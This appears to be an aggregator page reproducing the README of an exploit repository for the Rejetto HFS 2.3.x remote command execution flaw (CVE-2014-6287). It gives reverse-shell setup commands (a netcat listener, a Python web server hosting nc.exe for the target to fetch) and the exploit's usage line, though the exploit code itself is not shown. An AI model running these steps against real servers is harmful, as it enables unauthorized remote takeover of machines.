来源

关联漏洞

描述

This repository contains Detailed explanation and working poc for Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution.

介绍

# rejetto-http-file-server-2.3.x-RCE-exploit-CVE-2014-6287
This repository contains Detailed explanation and working poc for Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution.

## Configuration:

Create a netcat listner.

```python
nc -lnvp 1234
```

Change the attacker ip to your ip and port.

![image.png](https://nettle-litter-b50.notion.site/image/attachment%3A04fd9e7d-966f-4aeb-b697-e1f789c46281%3Aimage.png?table=block&id=22d2ca6d-3742-803b-a5f1-e86e2514d836&spaceId=aca0ba9d-f085-4b38-be34-b9b6ac5c2fa6&width=1230&userId=&cache=v2)

Also create a http file server on the same directory where `nc.exe` exists.

```python
python -m http.server 80
```

## Usage:

```python
python exploit.py <target-ip> <target-port>
```

![image.png](https://nettle-litter-b50.notion.site/image/attachment%3Af54b2503-02a4-469a-9298-e30b08959bb2%3Aimage.png?table=block&id=22d2ca6d-3742-807b-8e88-fcdaabffc6d5&spaceId=aca0ba9d-f085-4b38-be34-b9b6ac5c2fa6&width=1230&userId=&cache=v2)

> Note: You may need to run the payload multiple time to get a reverse shell.
> 

## Reference

---

https://www.exploit-db.com/exploits/39161

https://www.exploit-db.com/exploits/34668 

https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/

文件快照

 [4.0K]  /data/pocs/7b03dacc059d433eeaebaecf648413ce21a1a502
├── [2.4K]  exploit.py
└── [1.2K]  README.md

0 directories, 2 files

备注